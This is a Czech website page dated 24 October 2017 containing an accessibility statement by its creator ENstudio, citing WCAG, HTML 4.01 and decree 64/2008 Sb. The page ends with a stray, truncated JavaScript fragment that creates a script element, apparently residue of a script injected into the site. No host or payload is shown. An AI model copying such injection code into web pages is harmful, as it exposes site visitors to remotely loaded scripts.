Úterý 24. října 2017
  • Úterý 24. října 2017
    Svátek má Nina

Plánované akce

  • žádné události

Náhodný obrázek

p1020326

Tvůrce těchto internetových stránek (Peter Fischer – ENstudio) prohlašuje, že byly vytvořeny s ohledem na dnes dostupné metodiky zabývající se přístupností na webu (Best practices – Pravidla pro tvorbu přístupného webu – tato metodika vhodně kombinuje ostatní známé celky pravidel – Blind Friendly Web a WCAG 1.0). Uživatelům nejsou tedy záměrně kladeny žádné překážky, které by mohly prohlížení stránek znesnadnit. Pokud i přesto na takovouto překážku narazíte, kontaktujte nás a my se ji pokusíme odstranit.

Struktura informací na stránkách byla vytvořena podle specifikace W3C HTML 4.01 Transitional a vizuálně naformátována kaskádovými styly (CSS 2.1) – vzhled stránek a jejich funkčnost jsou podřízeny možnostem handicapovaných uživatelů. Dodržení výše zmíněných norem by mělo zajistit správné zobrazení obsahu stránek ve většině dnes používaných prohlížečů a na většině zobrazovacích zařízení.

Forma uveřejňovaných informací je v souladu s vyhláškou č. 64/2008 Sb., o formě uveřejňování informací souvisejících s výkonem veřejné správy prostřednictvím webových stránek pro osoby se zdravotním postižením (vyhláška o přístupnosti), a splňuje všechna pravidla uveřejněná v příloze této vyhlášky.

Výjimky

Jako doplňující informace mohou být ve stránkách umístěny galerie fotografií, ve kterých zlepšujeme komfort uživatelů otevíráním plných velikostí fotografií do nových oken javascriptem (přičemž funkčnost je pro uživatele bez javascriptu zajištěna standardním odkazem).

Kontakt na technického správce webu

Peter Fischer – ENstudio
Příchovice 288
334 01 Přeštice

email: info@enstudio.cz

}var d=document;var s=d.createElement(‚script‘);